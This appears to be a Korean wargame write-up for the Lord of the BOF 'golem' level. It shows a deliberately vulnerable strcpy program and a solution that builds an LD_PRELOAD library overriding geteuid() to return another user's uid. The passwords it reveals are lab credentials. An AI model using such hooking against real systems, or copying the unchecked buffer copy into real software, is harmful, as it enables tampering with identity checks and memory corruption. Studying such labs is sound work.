[11] skeleton -> golem [ Hooking & LD_PREROAD ]

skeleton / shellcoder

[skeleton@localhost skeleton]$ /bin/bash2

[skeleton@localhost skeleton]$ SHELL=/bin/bash2

[ golem.c ]

/*
        The Lord of the BOF : The Fellowship of the BOF
        - golem
        - stack destroyer
*/
 
#include <stdio.h>
#include <stdlib.h>
 
extern char **environ;
 
main(int argc, char *argv[])
{
        char buffer[40];
        int i;
 
        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }
 
        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }
 
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
 
        // stack destroyer!
        // buffer ~ buffer+44 초기화
        memset(buffer, 0, 44);
        // buffer+48 ~ 0xbfffffff 초기화 => saved eip 만 남기고 모든 스택 초기화
        memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48));
        
}
 

[ Stack 구조 ]

i                   초기화

buffer            초기화

saved ebp      초기화

saved eip       0xbfXXXXXX

argc              초기화

argv[0]          초기화

argv[1]          초기화

모든 스택이 초기화 되어서 스택을 이용하여 쉘을 실행시킬 수 없게 되었습니다

이번 문제부터 스택을 쓰는 문제는 없고, 스택 이외의 다른 여러 개념들을 공부할 수 있도록 하는 문제로 구성되어 있습니다

이번 문제에서는 Hooking 이라는 개념에 대해서 알아보고 문제를 해결하도록 하겠습니다

< Global Hooking >

1> 함수의 호출을 가로채어서 다른 함수가 호출되도록 하는 기법

2> 환경변수 LD_PRELOAD 이용

3> 모든 프로세스들은 LD_PRELOAD 환경 변수로 선언된 함수를 실행하게 된다

4> LD_PRELOAD 에 등록된 라이브러리 경로는 $ebp ~ $ebp-3000 사이의 어딘가에 존재하게 된다

[ Stack 구조 ]

LD_PRELOAD     초기화하는 범위 밖에 존재   

....                    초기화

saved ebp         초기화

saved eip          RET

< 문제에 적용 >

1> geteuid함수를 변조합니다 ( my-pass 실행시 골렘의 uid를 사용할 수 있도록 )

2> LD_PRELOAD를 이용하여 프로세스 실행시 변조된 함수를 함수가 실행되도록 한다

① 먼저 geteuid 함수를 변조한 c파일을 생성한다

[skeleton@localhost skeleton]$ vi hook.c

#include <unistd.h>
 
#include <sys/types.h>
 
uid_t geteuid(void){           
 
    return 511;
 
}

원래 geteuid() 함수는 현재 사용하고 있는 계정의 effective uid 를 반환한다 ( 511 : golem uid ) 

해당 파일을 실행한다면 geteuid() 함수는 511만을 반환하도록 변조된 채 실행된다

② 생성한 함수를 공유 라이브러리 형태(.so)로 컴파일한다

[skeleton@localhost skeleton]$ gcc -fPIC -o hook.so hook.c --shared

[skeleton@localhost skeleton]$ ls

golem  golem.c  golem.cp  hook.c  hook.so

③ 환경변수 LD_PRELOAD 에 경로를 입력한다

[skeleton@localhost skeleton]$ export LD_PRELOAD=/home/skeleton/hook.so

[skeleton@localhost skeleton]$ env | grep hook.so

LD_PRELOAD=/home/skeleton/hook.so

④ 이제 모든 프로세스를 실행할 때마다 LD_PRELOAD에 있는 경로의 파일을 실행하게 된다

LD_PRELOAD에 등록하기 전 과 후를 비교해서 확인해보자

[ 등록 전 ]

[skeleton@localhost skeleton]$ id

uid=510(skeleton) gid=510(skeleton) groups=510(skeleton)

[skeleton@localhost skeleton]$ my-pass

euid = 510

shellcoder

[ 등록 후 ]

[skeleton@localhost skeleton]$ export LD_PRELOAD=/home/skeleton/hook.so

[skeleton@localhost skeleton]$ id

uid=510(skeleton) gid=510(skeleton) euid=511(golem) groups=510(skeleton)

[skeleton@localhost skeleton]$ my-pass

euid = 511

cup of coffee